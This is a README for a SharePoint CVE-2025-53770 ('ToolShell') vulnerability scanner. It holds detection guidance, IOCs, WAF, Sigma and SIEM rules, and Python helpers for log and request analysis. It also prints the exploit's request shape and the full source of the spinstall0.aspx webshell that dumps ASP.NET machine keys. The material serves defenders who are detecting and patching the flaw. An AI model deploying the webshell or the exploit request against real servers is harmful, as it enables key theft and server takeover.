ZephrFish/CVE-2025-53770-Scanner
CVE-2025-53770 SharePoint Vulnerability Scanner

Hacked together 100% from the payloads and attack variants floating around in tweets, so it comes with zero warranty. The scanner identifies vulnerable instances and ships with a config of exploitation patterns seen in the wild; it is primarily intended for defensive use, to find vulnerable SharePoint instances so that you can patch them.

This scanner performs automated checks of SharePoint deployments by:

  • Sending crafted POST requests to SharePoint ToolPane endpoints with exploit payloads
  • Detecting machine key extraction attempts and successful exploitation
  • Identifying secondary payload deployment (spinstall0.aspx)
  • Analyzing responses for vulnerability indicators based on observed attack patterns
  • Providing detailed reporting with confidence levels and immediate action alerts
  • Supporting concurrent scanning for efficiency

Key Detection Capabilities

CRITICAL: Machine Key Extraction Detection

  • Detects successful machine key extraction responses
  • Identifies ValidationKey, DecryptionKey, and CompatibilityMode exposure
  • Recognizes pipe-delimited machine key patterns (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
  • Triggers immediate action alerts for compromised systems

Secondary Payload Detection

  • Identifies spinstall0.aspx deployment attempts
  • Detects C# ASP.NET payload code patterns
  • Recognizes System.Web.Configuration.MachineKeySection usage
  • Version-specific path detection (SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\)

Installation

  1. Clone the repository:
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  2. Install dependencies:
pip install -r requirements.txt

Usage

Basic Usage

Create a text file with target hosts (one per line):

sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

Run the scanner:

python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

Command Line Options

Option          Description                                    Default
-i, --input     Path to host list file (required)              -
-o, --output    Output file for results (.json, .csv, .txt)    None
-l, --logfile   Log file path for detailed logging             None
-t, --threads   Number of concurrent threads                   10
-v, --verbose   Enable verbose output and logging              False

Output Formats

JSON Output (-o results.json)

[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

CSV Output (-o results.csv)

Provides tabular data suitable for spreadsheet analysis with columns for all scan metrics.

Text Output (-o results.txt)

Human-readable format with vulnerability status and scan details.

Vulnerability Details

CVE-2025-53770 is a deserialization-of-untrusted-data vulnerability in on-premises SharePoint Server that has been actively exploited in the wild as part of the "ToolShell" chain: an unauthenticated POST to the ToolPane.aspx endpoint (sent with a Referer of /_layouts/SignOut.aspx to bypass authentication) smuggles in a PerformancePoint Scorecard ExcelDataSet control whose CompressedDataTable attribute carries a gzip-compressed, base64-encoded serialized payload. The scanner detects:

Identified Attack Patterns

  1. Initial Exploitation: POST request to /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx with serialized payload
  2. Machine Key Extraction: Successful exploitation returns pipe-delimited machine configuration:
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
    Example: [128-256 hex chars]|HMACSHA256|[48-96 hex chars]|AES|Framework45
    
  3. Secondary Payload: Deployment of spinstall0.aspx for persistent access and key extraction
  4. Version Targeting: Different paths for SharePoint versions (15/ vs 16/ layouts)

Confirmed IOCs from Active Exploitation

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer: /_layouts/SignOut.aspx
  • Content-Length: Typically 7699-8000+ bytes
  • Payload Size: Large base64-encoded CompressedDataTable parameters
  • Response Indicators: Machine key strings, spinstall0.aspx deployment
  • Attack Infrastructure: 65.38.121.198, 162.243.204.189, 165.22.18.129

Detection Logic

The scanner analyzes responses for:

  1. Machine key extraction patterns (CRITICAL confidence)
  2. Secondary payload indicators (HIGH confidence)
  3. ExcelDataSet/Scorecard component processing (MEDIUM confidence)
  4. ToolPane error patterns and anomalous response characteristics (LOW confidence)
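The four confidence tiers above are easy to get wrong in practice (a key dump hidden inside an HTML error page, a webshell page that also mentions ExcelDataSet, keys written to the scan log in full). The following is an added example, not code from the scanner, that implements that tiering over a response body and redacts any key material it finds; the regexes and sample bodies are constructed here, and the enumeration values come from the ASP.NET MachineKeyValidation and MachineKeyCompatibilityMode types.

```python
import re

# Layout of the key dump returned by a successful ToolShell chain:
#   ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
# The enumerations are the documented MachineKeyValidation and
# MachineKeyCompatibilityMode members; key lengths are left loose because
# machineKey configurations vary between farms.
MACHINE_KEY_RE = re.compile(
    r"(?P<validation_key>[0-9A-Fa-f]{40,256})\|"
    r"(?P<validation>MD5|SHA1|3DES|TripleDES|AES|HMACSHA256|HMACSHA384|HMACSHA512)\|"
    r"(?P<decryption_key>[0-9A-Fa-f]{16,128})\|"
    r"(?P<decryption>Auto|AES|DES|3DES)\|"
    r"(?P<compat>Framework20SP1|Framework20SP2|Framework45)"
)

# Second stage: the spinstall0.aspx key dumper or the reflection calls it makes.
SECONDARY_RE = re.compile(
    r"spinstall0\.aspx|System\.Web\.Configuration\.MachineKeySection|GetApplicationConfig",
    re.IGNORECASE,
)

# The PerformancePoint control the payload is smuggled through.
COMPONENT_RE = re.compile(
    r"Scorecard:ExcelDataSet|ExcelDataSet|Microsoft\.PerformancePoint", re.IGNORECASE
)

# ToolPane error text on its own is a weak signal (any broken web part edit produces it).
TOOLPANE_ERR_RE = re.compile(r"ToolPane\.aspx|Sorry, something went wrong", re.IGNORECASE)

LEVELS = ("NONE", "LOW", "MEDIUM", "HIGH", "CRITICAL")


def redact(secret: str) -> str:
    """Keep enough of a key to correlate findings without logging the key itself."""
    return f"{secret[:6]}...({len(secret)} hex chars)"


def classify_response(status_code: int, body: str) -> dict:
    """Map one HTTP response to the scanner's confidence tiers plus the evidence.
    Returns {"level": ..., "status_code": ..., "evidence": [...]}; keys are never
    returned in full."""
    findings = []

    m = MACHINE_KEY_RE.search(body)
    if m:
        findings.append(("CRITICAL", "machine key dump: validation=%s key=%s decryption=%s key=%s mode=%s" % (
            m["validation"], redact(m["validation_key"]),
            m["decryption"], redact(m["decryption_key"]), m["compat"])))

    for regex, level, label in (
        (SECONDARY_RE, "HIGH", "secondary payload indicator"),
        (COMPONENT_RE, "MEDIUM", "ExcelDataSet/Scorecard component referenced"),
    ):
        hit = regex.search(body)
        if hit:
            findings.append((level, f"{label}: {hit.group(0)}"))

    if status_code >= 500 or TOOLPANE_ERR_RE.search(body):
        findings.append(("LOW", f"ToolPane error or anomalous status {status_code}"))

    # Highest tier wins; all supporting evidence is kept for the report.
    level = max((f[0] for f in findings), key=LEVELS.index, default="NONE")
    return {"level": level, "status_code": status_code, "evidence": [f[1] for f in findings]}


# Constructed sample bodies (not captured traffic): the hex is filler, not leaked key material.
SAMPLE_KEY_DUMP = ("AB" * 64) + "|HMACSHA256|" + ("CD" * 32) + "|AES|Framework45"
SAMPLE_WEBSHELL_PAGE = '<script runat="server">var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");</script>'
SAMPLE_COMPONENT_ERROR = "Unable to load control Scorecard:ExcelDataSet"
SAMPLE_TOOLPANE_ERROR = "<html><body>Sorry, something went wrong. ToolPane.aspx</body></html>"
SAMPLE_BENIGN = "<html><body>Welcome to SharePoint</body></html>"

if __name__ == "__main__":
    for name, code, body in (("key dump", 200, SAMPLE_KEY_DUMP), ("webshell", 200, SAMPLE_WEBSHELL_PAGE),
                             ("component", 500, SAMPLE_COMPONENT_ERROR), ("toolpane", 500, SAMPLE_TOOLPANE_ERROR),
                             ("benign", 200, SAMPLE_BENIGN)):
        print(name, classify_response(code, body))
```

The key regex deliberately anchors on the enumeration values rather than on key length, since a farm configured with a shorter validationKey is still compromised when it is echoed back; what matters operationally is that the scan log and JSON output never contain the full key, which is why the evidence string is built from `redact()`.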

Security Considerations

  • This tool is designed for authorized security testing only
  • Ensure proper authorization before scanning any systems
  • The checks reuse the request shape seen in the wild, so every scan will trip the IIS, ULS, WAF and SIEM detections described below; tell your SOC before running it
  • Scanner uses HTTPS by default but does not validate certificates (self-signed certificates are accepted), so it cannot confirm it reached the host you intended
  • Logs and result files may contain sensitive information, including any key material echoed back by compromised hosts; secure them appropriately
  • Consider network impact when using high thread counts

Example Scan Session

$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json

Troubleshooting

Common Issues

  1. Connection Timeouts: Increase timeout or reduce thread count
  2. SSL Errors: Scanner disables SSL warnings by default
  3. Permission Errors: Ensure write access for output/log files
  4. Memory Usage: Monitor with large host lists

Log Analysis

Enable verbose logging (-v) and log files (-l) for detailed troubleshooting:

tail -f scan.log

Exploitation Analysis

Observed Attack Payloads

The scanner incorporates detection for confirmed exploitation patterns observed in active attacks:

Primary Payload Structure

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]

Secondary Payload (spinstall0.aspx)

<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

Expected Machine Key Response Format

ValidationKey: [128-256 character hex string]
Validation: one of the MachineKeyValidation values: HMACSHA256|HMACSHA384|HMACSHA512|SHA1|MD5|3DES|AES
DecryptionKey: [48-96 character hex string]
Decryption: Auto|AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework20SP2|Framework45 (the only MachineKeyCompatibilityMode values; there is no Framework40)

Detection and Monitoring Guidance

Detecting CVE-2025-53770 Exploitation Attempts

Organizations should implement the following detection mechanisms to identify potential exploitation attempts:

1. Web Application Firewall (WAF) Rules

Monitor for suspicious POST requests to SharePoint ToolPane endpoints:

# Example WAF detection rule patterns
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Query string: "DisplayMode=Edit&a=/ToolPane.aspx"
Request body containing: "MSOTlPn_Uri", "MSOTlPn_DWP"
Request body containing: "ExcelDataSet", "CompressedDataTable"
Request body containing: "Scorecard:ExcelDataSet"
Request body containing: "H4sIAAAAAAAEA" (base64 of a gzip header with zeroed flags and mtime; "H4sI" alone is the 1F 8B 08 magic, and it may be percent-encoded in the form body)
Content-Length > 5000 bytes (typical payload size)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx

Exploitation patterns observed:

  • Payload sizes typically 7000-8000+ bytes
  • URL-encoded compressed data in CompressedDataTable parameter
  • Specific User-Agent string: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
  • Content-Type: application/x-www-form-urlencoded
  • Connection: close header often present
  • Base64-encoded serialized .NET objects in payload
  • Response contains machine keys in pipe-delimited format
  • Secondary requests to deployed spinstall0.aspx files
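Most of the WAF indicators above are string matches on a URL-encoded body, and two of them (User-Agent, Referer) are trivially changed by the next operator. The following is an added example, not part of the scanner or any WAF product, of a request-side check that decodes the form, pulls the CompressedDataTable attribute out of MSOTlPn_DWP and verifies the gzip magic after base64-decoding, grading structural indicators above the spoofable ones. The sample request is constructed: its compressed table is an empty placeholder DataSet, not a deserialization gadget, and the host name is made up.

```python
import base64
import gzip
import re
from urllib.parse import parse_qs, urlencode, urlsplit

GZIP_MAGIC = b"\x1f\x8b\x08"  # the bytes that "H4sI" decodes to
TOOLPANE_PATH_RE = re.compile(r"^/_layouts/\d+/ToolPane\.aspx$", re.IGNORECASE)
COMPRESSED_TABLE_RE = re.compile(r'CompressedDataTable\s*=\s*"([^"]+)"', re.IGNORECASE)


def parse_raw_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, headers, body).
    Header names are lower-cased; the body is returned undecoded."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def looks_like_gzip_b64(value: str) -> bool:
    """Decode only the first 8 base64 characters (6 bytes) and test the gzip header.
    Cheaper and more robust than a literal match on "H4sIAAAAAAAEA": it does not
    inflate anything and ignores whatever follows the header."""
    head = re.sub(r"\s", "", value)[:8]
    if len(head) < 8:
        return False
    try:
        return base64.b64decode(head, validate=True).startswith(GZIP_MAGIC)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False


def inspect_request(raw: str) -> dict:
    """Score one request against the observed ToolShell shape. Structural indicators
    (endpoint, form fields, control, gzip blob) are what the exploit needs to work;
    User-Agent and Referer are trivially changed, so they only raise suspicion."""
    method, target, headers, body = parse_raw_request(raw)
    url = urlsplit(target)
    query = parse_qs(url.query)
    is_form = headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
    form = parse_qs(body, keep_blank_values=True) if is_form else {}
    dwp = form.get("MSOTlPn_DWP", [""])[0]
    table = COMPRESSED_TABLE_RE.search(dwp)

    strong = {
        "toolpane_post": method.upper() == "POST" and bool(TOOLPANE_PATH_RE.match(url.path)),
        "edit_mode_query": query.get("DisplayMode", [""])[0].lower() == "edit"
        and query.get("a", [""])[0].lower().endswith("toolpane.aspx"),
        "toolpane_form_fields": "MSOTlPn_Uri" in form and "MSOTlPn_DWP" in form,
        "exceldataset_control": "exceldataset" in dwp.lower(),
        "gzip_compressed_table": bool(table) and looks_like_gzip_b64(table.group(1)),
    }
    weak = {
        "signout_referer": headers.get("referer", "").lower().endswith("/_layouts/signout.aspx"),
        "campaign_user_agent": "rv:120.0) gecko/20100101 firefox/120.0" in headers.get("user-agent", "").lower(),
        "large_body": len(body.encode()) > 5000,
    }

    if strong["toolpane_post"] and (strong["exceldataset_control"] or strong["gzip_compressed_table"]):
        verdict = "exploit_attempt"
    elif strong["toolpane_post"] and (strong["edit_mode_query"] or any(weak.values())):
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "strong": strong, "weak": weak}


def build_sample_request(host: str = "sp.example.com") -> str:
    """Constructed request with the shape of the observed attack. The compressed
    table is a harmless placeholder DataSet, not a deserialization gadget."""
    blob = base64.b64encode(gzip.compress(b"<DataSet/>")).decode()
    dwp = f'<Scorecard:ExcelDataSet CompressedDataTable="{blob}" runat="server" />'
    body = urlencode({
        "MSOTlPn_Uri": f"http://{host}/_controltemplates/15/AclEditor.ascx",
        "MSOTlPn_DWP": dwp,
    })
    return (
        "POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Referer: /_layouts/SignOut.aspx\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n" + body
    )


BENIGN_REQUEST = "GET /_layouts/15/start.aspx HTTP/1.1\r\nHost: sp.example.com\r\nUser-Agent: curl/8.0\r\n\r\n"

if __name__ == "__main__":
    print(inspect_request(build_sample_request()))
    print(inspect_request(BENIGN_REQUEST))
```

Note that the sample body is far smaller than the 7000-8000 bytes seen in real attacks, so `large_body` stays false for it; the verdict still comes out as an exploit attempt because the endpoint, the ExcelDataSet control and the gzip blob are present, which is the point of weighting structure over size and headers.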

2. SharePoint ULS Logs

Monitor SharePoint Unified Logging Service (ULS) logs for:

Category: SharePoint Foundation Web Controls
Level: Unexpected, Error, Critical
Keywords: "ToolPane", "ExcelDataSet", "Deserialization"
Process: w3wp.exe

Key indicators in ULS logs:

  • Unexpected exceptions in ToolPane.aspx processing
  • Deserialization errors in Microsoft.PerformancePoint components
  • Memory corruption or process crashes in w3wp.exe

3. IIS Access Logs

Monitor IIS logs for exploitation patterns:

# Log analysis queries (replace with your SIEM syntax)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (typical exploit payload size; cs-bytes is not in the default IIS W3C field set, so enable it in the site's logging fields or this clause never matches)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (slow processing indicating deserialization)

Specific IOCs from real attacks:

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Body contains: MSOTlPn_Uri=http%3A%2F%2F[domain]%2F_controltemplates%2F15%2FAclEditor.ascx
Body contains: CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ

4. Network Traffic Analysis

Monitor network traffic for:

  • Unusual POST request sizes to SharePoint servers
  • Repeated requests to ToolPane.aspx from single sources
  • Base64 encoded payloads in HTTP POST bodies
  • Non-browser User-Agent strings targeting SharePoint

5. Windows Event Logs

Monitor Windows Event Logs on SharePoint servers:

Event Log: Application
Source: ASP.NET, SharePoint Foundation
Event IDs: 1309, 1310 (application errors)
Event Log: System
Source: Application Error
Process: w3wp.exe crashes

6. SIEM Detection Rules

Splunk Detection Query:

index=iis source="*iis*"
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size

Enhanced Detection for Real Attacks:

index=iis
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Other")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status

Elastic/Kibana Query:

{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}

Sigma Rule for CVE-2025-53770:

title: CVE-2025-53770 SharePoint ExcelDataSet Exploitation
id: cve-2025-53770-sharepoint-exploit   # replace with a UUID before importing; Sigma requires a UUID here
description: Detects exploitation attempts of CVE-2025-53770 SharePoint deserialization vulnerability
references:
    - https://github.com/ZephrFish/CVE-2025-53770-Scanner
author: Security Team
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes|gte: 7000
        cs-bytes|lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Editing web parts in the browser also POSTs to ToolPane.aspx; the SignOut.aspx Referer and the DisplayMode=Edit&a=/ToolPane.aspx query are the discriminators
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770
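The IIS log queries and the Sigma rule above all express the same selection, and all of them depend on details of how IIS writes W3C logs: columns are named by the #Fields: directive, spaces inside User-Agent and Referer are written as '+', and cs-bytes only exists if it was enabled. The following is an added example, not part of the scanner, that applies that selection to log lines offline, so the logic can be checked before it is encoded in a SIEM. The log excerpt is constructed for this example; the client addresses and usernames in it are made up.

```python
import re
from urllib.parse import unquote

TOOLPANE_STEM_RE = re.compile(r"^/_layouts/\d+/ToolPane\.aspx$", re.IGNORECASE)
CAMPAIGN_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
PLUS_ENCODED = ("cs(User-Agent)", "cs(Referer)")  # IIS writes '+' for spaces in these


def parse_w3c_log(text: str):
    """Yield one dict per log entry, naming columns from the #Fields: directive
    so the parser follows whatever field set the server is configured to log."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log entry before #Fields: directive")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or malformed entry
        entry = dict(zip(fields, values))
        for name in PLUS_ENCODED:
            if name in entry:
                entry[name] = entry[name].replace("+", " ")
        yield entry


def detect_toolshell(entries):
    """Return one hit per POST to ToolPane.aspx, graded by how many of the
    observed indicators line up. Admins editing web parts also POST here,
    which is why a lone POST is only 'low'."""
    hits = []
    for e in entries:
        if e.get("cs-method") != "POST" or not TOOLPANE_STEM_RE.match(e.get("cs-uri-stem", "")):
            continue
        reasons = ["POST to ToolPane.aspx"]
        query = unquote(e.get("cs-uri-query", ""))
        if "DisplayMode=Edit" in query and "a=/ToolPane.aspx" in query:
            reasons.append("exploit query string DisplayMode=Edit&a=/ToolPane.aspx")
        if e.get("cs(Referer)", "-").lower().endswith("/_layouts/signout.aspx"):
            reasons.append("SignOut.aspx Referer")
        if e.get("cs(User-Agent)") == CAMPAIGN_UA:
            reasons.append("User-Agent seen in the campaign")
        cs_bytes = e.get("cs-bytes", "-")  # absent unless enabled in IIS logging
        if cs_bytes.isdigit() and int(cs_bytes) >= 7000:
            reasons.append(f"request body {cs_bytes} bytes")
        severity = "high" if len(reasons) >= 3 else "medium" if len(reasons) == 2 else "low"
        hits.append({
            "time": f"{e['date']} {e['time']}",
            "client": e.get("c-ip"),
            "status": e.get("sc-status"),
            "severity": severity,
            "reasons": reasons,
        })
    return hits


# Constructed IIS W3C log excerpt (not from a real server). Line 2 has the attack
# shape; line 3 is an admin editing a web part, which also POSTs to ToolPane.aspx.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2025-07-21 10:30:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
2025-07-21 10:30:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 CONTOSO\\alice 10.0.0.77 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Chrome/126.0 https://sp.example.com/ 200 0 0 18234 612 45
2025-07-21 10:30:02 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 /_layouts/SignOut.aspx 200 0 0 4096 7699 6120
2025-07-21 10:31:10 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&PageView=Shared 443 CONTOSO\\bob 10.0.0.88 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Chrome/126.0 https://sp.example.com/sites/hr/default.aspx 200 0 0 22000 1480 210
"""

if __name__ == "__main__":
    for hit in detect_toolshell(parse_w3c_log(SAMPLE_LOG)):
        print(hit)
```

The unauthenticated POST from 203.0.113.10 with the SignOut.aspx Referer, the campaign User-Agent and a 7699-byte body comes out as high; the authenticated edit by CONTOSO\bob only as low, which is the false-positive class the Sigma rule warns about. If cs-bytes is missing from #Fields: the size reason simply never fires, which is the same silent failure the SIEM queries would have.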

7. Behavioral Indicators

Watch for these post-exploitation behaviors:

  • Unusual outbound network connections from SharePoint servers
  • New user accounts created in SharePoint or Active Directory
  • Unauthorized file uploads or modifications
  • Privilege escalation attempts
  • Lateral movement to other systems

Recommended Response Actions

  1. Immediate Response:

    • Block suspicious source IPs at firewall/WAF
    • Isolate affected SharePoint servers if exploitation confirmed
    • Preserve logs and memory dumps for forensic analysis
  2. Investigation:

    • Analyze POST request payloads for malicious content
    • Check for indicators of successful code execution
    • Review user account activities and permissions changes
    • Correlate with other security events
  3. Containment:

    • Apply security patches immediately
    • Implement WAF rules to block exploitation attempts
    • Segment SharePoint servers from critical network resources

SIEM Integration Examples

Importing Scan Results into Splunk:

# Generate scan results
python3 scanner.py -i hosts.txt -o results.json
# results.json is a bare JSON array. The HEC event endpoint only accepts
# {"event": ...} objects, so either wrap each result as {"event": <result>}
# (one object per line) and POST to /services/collector/event, or send the
# file as-is to the raw endpoint:
curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector/raw?sourcetype=_json" \
  --data-binary @results.json
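Sending the results array to the raw endpoint indexes it as one blob, which makes per-host searching awkward. The following is an added example, not part of the scanner, that wraps each result in the HEC event envelope with the scan time as the event timestamp, ready for the /services/collector/event endpoint; the index and sourcetype names are assumptions, and the sample results are constructed in the scanner's output format.

```python
import json
from datetime import datetime, timezone


def to_hec_events(results, index="sharepoint_scans", sourcetype="cve_2025_53770_scan",
                  source="scanner.py") -> str:
    """Render scanner results as newline-delimited HEC event objects for
    POST to /services/collector/event. Each result becomes its own event with
    the scan time as the event time, so Splunk indexes and searches them
    individually instead of as one JSON array blob."""
    lines = []
    for r in results:
        ts = datetime.fromisoformat(r["scan_time"])
        if ts.tzinfo is None:
            ts = ts.replace(tzinfo=timezone.utc)  # assumption: scanner timestamps are UTC
        envelope = {
            "time": ts.timestamp(),
            "host": r["host"],
            "source": source,
            "sourcetype": sourcetype,
            "index": index,
            "event": dict(r, cve="CVE-2025-53770"),
        }
        lines.append(json.dumps(envelope, separators=(",", ":")))
    return "\n".join(lines) + "\n"


def parse_hec_events(text: str):
    """Inverse of to_hec_events, used to check what Splunk would receive."""
    return [json.loads(line) for line in text.splitlines() if line]


# Constructed results in the scanner's JSON output format (not a real scan).
SAMPLE_RESULTS = [
    {"host": "sharepoint.example.com",
     "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
     "scan_time": "2025-07-21T10:30:00.123456", "vulnerable": True, "status_code": 200,
     "response_size": 15432, "error": None, "response_time": 1.23},
    {"host": "sp-dev.example.com",
     "url": "https://sp-dev.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
     "scan_time": "2025-07-21T10:30:01.500000", "vulnerable": False, "status_code": 403,
     "response_size": 1280, "error": None, "response_time": 0.41},
]

if __name__ == "__main__":
    # Write hec_events.jsonl, then:
    #   curl -k -H "Authorization: Splunk <token>" \
    #     "https://splunk-server:8088/services/collector/event" --data-binary @hec_events.jsonl
    with open("hec_events.jsonl", "w") as fh:
        fh.write(to_hec_events(SAMPLE_RESULTS))
```

Because the scanner's timestamps carry no timezone, the conversion has to pick one; treating them as UTC is stated as an assumption in the code and should be adjusted if the scanning host writes local time, otherwise the events land hours away from the IIS log entries they need to be correlated with.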

About

ToolShell scanner - CVE-2025-53770 and detection information
